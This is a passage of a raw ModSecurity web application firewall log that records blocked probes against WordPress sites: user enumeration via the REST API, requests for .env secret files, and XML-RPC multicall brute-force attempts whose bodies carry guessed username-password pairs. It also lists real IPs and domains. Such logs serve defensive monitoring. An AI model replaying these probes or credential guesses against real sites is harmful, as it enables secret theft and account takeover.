Stopwatch2: 1749134249595971 669; combined=262, p1=227, p2=0, p3=0, p4=0, p5=34, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6ee5a4e-Z-- --ad6e7203-A-- [05/Jun/2025:21:40:22 +0700] aEGsVirHpfaS2Cuwh8UMtAAAAFI 103.236.140.4 36830 103.236.140.4 8181 --ad6e7203-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.47.35.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.47.35.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ad6e7203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad6e7203-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749134422720712 2901 (- - -) Stopwatch2: 1749134422720712 2901; combined=1421, p1=485, p2=906, p3=0, p4=0, p5=30, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad6e7203-Z-- --bf0eac67-A-- [05/Jun/2025:21:43:08 +0700] aEGs_Oth7G2xELALzPZgyQAAANc 103.236.140.4 37444 103.236.140.4 8181 --bf0eac67-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bf0eac67-C-- system.multicallmethodNamewp.getUsersBlogsparamsboss229Boss229@2024 --bf0eac67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf0eac67-E-- --bf0eac67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749134588144425 5756 (- - -) Stopwatch2: 1749134588144425 5756; combined=4205, p1=470, p2=3566, p3=0, p4=0, p5=100, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf0eac67-Z-- --e2511d17-A-- [05/Jun/2025:21:46:11 +0700] aEGts-th7G2xELALzPZhRgAAAMs 103.236.140.4 39774 103.236.140.4 8181 --e2511d17-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 507 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e2511d17-C-- system.multicallmethodNamewp.getUsersBlogsparamshuzaifasarfaraz2299Huzaifasarfaraz2299@ --e2511d17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2511d17-E-- --e2511d17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749134771364975 5367 (- - -) Stopwatch2: 1749134771364975 5367; combined=4050, p1=486, p2=3393, p3=0, p4=0, p5=100, sr=91, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2511d17-Z-- --57af335d-A-- [05/Jun/2025:21:56:33 +0700] aEGwIX-K7ToMdu-YSIJbxgAAAAA 103.236.140.4 43050 103.236.140.4 8181 --57af335d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 160.119.242.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 160.119.242.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --57af335d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57af335d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749135393226625 2032 (- - -) Stopwatch2: 1749135393226625 2032; combined=956, p1=333, p2=595, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57af335d-Z-- --ebc1da40-A-- [05/Jun/2025:22:04:22 +0700] aEGx9n-K7ToMdu-YSIJb6AAAABg 103.236.140.4 43134 103.236.140.4 8181 --ebc1da40-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 530) like Gecko Accept-Charset: utf-8 --ebc1da40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebc1da40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749135862443408 801 (- - -) Stopwatch2: 1749135862443408 801; combined=337, p1=279, p2=0, p3=0, p4=0, p5=58, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebc1da40-Z-- --38163e71-A-- [05/Jun/2025:22:06:37 +0700] aEGyfX-K7ToMdu-YSIJb8QAAAAI 103.236.140.4 43194 103.236.140.4 8181 --38163e71-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.28 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --38163e71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38163e71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749135997515396 723 (- - -) Stopwatch2: 1749135997515396 723; combined=272, p1=236, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38163e71-Z-- --b66b8c36-A-- [05/Jun/2025:22:09:43 +0700] aEGzNyrHpfaS2Cuwh8UN6wAAAFU 103.236.140.4 43266 103.236.140.4 8181 --b66b8c36-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 Accept-Charset: utf-8 --b66b8c36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b66b8c36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749136183977439 678 (- - -) Stopwatch2: 1749136183977439 678; combined=289, p1=254, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b66b8c36-Z-- --a81b4349-A-- [05/Jun/2025:22:09:58 +0700] aEGzRlwdJdhOudw5hdwDaAAAAIY 103.236.140.4 43274 103.236.140.4 8181 --a81b4349-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.115.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.115.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 Accept-Charset: utf-8 --a81b4349-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a81b4349-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749136198885924 721 (- - -) Stopwatch2: 1749136198885924 721; combined=297, p1=262, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a81b4349-Z-- --9cd48573-A-- [05/Jun/2025:22:42:26 +0700] aEG64n-K7ToMdu-YSIJccAAAAAY 103.236.140.4 43816 103.236.140.4 8181 --9cd48573-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.20.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.20.105 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9cd48573-C-- system.multicallmethodNamewp.getUsersBlogsparamsmarcolau_P@ssw0rd123 --9cd48573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cd48573-E-- --9cd48573-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.20.105 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749138146772480 5251 (- - -) Stopwatch2: 1749138146772480 5251; combined=4011, p1=462, p2=3381, p3=0, p4=0, p5=100, sr=85, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cd48573-Z-- --ce8b2f25-A-- [05/Jun/2025:23:08:14 +0700] aEHA7n-K7ToMdu-YSIJcyAAAAAY 103.236.140.4 44224 103.236.140.4 8181 --ce8b2f25-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.64.28 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.64.28 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ce8b2f25-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin2233 --ce8b2f25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce8b2f25-E-- --ce8b2f25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.64.28 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749139694961467 4350 (- - -) Stopwatch2: 1749139694961467 4350; combined=3411, p1=362, p2=2886, p3=0, p4=0, p5=96, sr=79, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce8b2f25-Z-- --3a76da5e-A-- [05/Jun/2025:23:11:46 +0700] aEHBwn-K7ToMdu-YSIJc0gAAABg 103.236.140.4 44290 103.236.140.4 8181 --3a76da5e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.241.157.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.241.157.115 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3a76da5e-C-- system.multicallmethodNamewp.getUsersBlogsparamsdemoDemo123* --3a76da5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a76da5e-E-- --3a76da5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.241.157.115 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749139906755516 4860 (- - -) Stopwatch2: 1749139906755516 4860; combined=3674, p1=407, p2=3101, p3=0, p4=0, p5=98, sr=81, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a76da5e-Z-- --3d9d9831-A-- [05/Jun/2025:23:13:47 +0700] aEHCO1wdJdhOudw5hdwD-QAAAJE 103.236.140.4 44336 103.236.140.4 8181 --3d9d9831-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.64.28 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.64.28 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3d9d9831-C-- system.multicallmethodNamewp.getUsersBlogsparamsmeganMegan1234!@#$ --3d9d9831-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d9d9831-E-- --3d9d9831-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.64.28 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749140027446660 5086 (- - -) Stopwatch2: 1749140027446660 5086; combined=3745, p1=382, p2=3176, p3=0, p4=0, p5=110, sr=74, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d9d9831-Z-- --6cb6743e-A-- [05/Jun/2025:23:22:51 +0700] aEHEW1wdJdhOudw5hdwEBAAAAIg 103.236.140.4 44456 103.236.140.4 8181 --6cb6743e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.108.120.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.108.120.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6cb6743e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cb6743e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749140571008077 3430 (- - -) Stopwatch2: 1749140571008077 3430; combined=1477, p1=519, p2=926, p3=0, p4=0, p5=32, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cb6743e-Z-- --a5e3f74d-A-- [05/Jun/2025:23:27:26 +0700] aEHFbirHpfaS2Cuwh8UOWAAAAEU 103.236.140.4 44492 103.236.140.4 8181 --a5e3f74d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.70 Accept-Charset: utf-8 --a5e3f74d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5e3f74d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749140846396762 752 (- - -) Stopwatch2: 1749140846396762 752; combined=286, p1=249, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5e3f74d-Z-- --5cdd640b-A-- [05/Jun/2025:23:27:30 +0700] aEHFcuth7G2xELALzPZiaQAAAMI 103.236.140.4 44494 103.236.140.4 8181 --5cdd640b-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G965U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.0 Chrome/67.0.3396.87 Mobile Safari/537.36 Accept-Charset: utf-8 --5cdd640b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cdd640b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749140850845651 29871 (- - -) Stopwatch2: 1749140850845651 29871; combined=58680, p1=226, p2=0, p3=0, p4=0, p5=29244, sr=66, sw=0, l=0, gc=29210 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cdd640b-Z-- --feb0ae61-A-- [05/Jun/2025:23:36:58 +0700] aEHHqirHpfaS2Cuwh8UOXwAAAFM 103.236.140.4 44630 103.236.140.4 8181 --feb0ae61-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --feb0ae61-C-- system.multicallmethodNamewp.getUsersBlogsparamssophieSophie123+ --feb0ae61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --feb0ae61-E-- --feb0ae61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749141418065240 5619 (- - -) Stopwatch2: 1749141418065240 5619; combined=3967, p1=462, p2=3339, p3=0, p4=0, p5=99, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --feb0ae61-Z-- --b1930f02-A-- [05/Jun/2025:23:41:19 +0700] aEHIr3-K7ToMdu-YSIJc9wAAAAQ 103.236.140.4 44676 103.236.140.4 8181 --b1930f02-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.177 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Opera/6.05 (Windows NT 4.0; U) [de] --b1930f02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1930f02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749141679819645 836 (- - -) Stopwatch2: 1749141679819645 836; combined=314, p1=274, p2=0, p3=0, p4=0, p5=39, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1930f02-Z-- --28f1da75-A-- [05/Jun/2025:23:41:20 +0700] aEHIsH-K7ToMdu-YSIJc-AAAAAs 103.236.140.4 44678 103.236.140.4 8181 --28f1da75-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 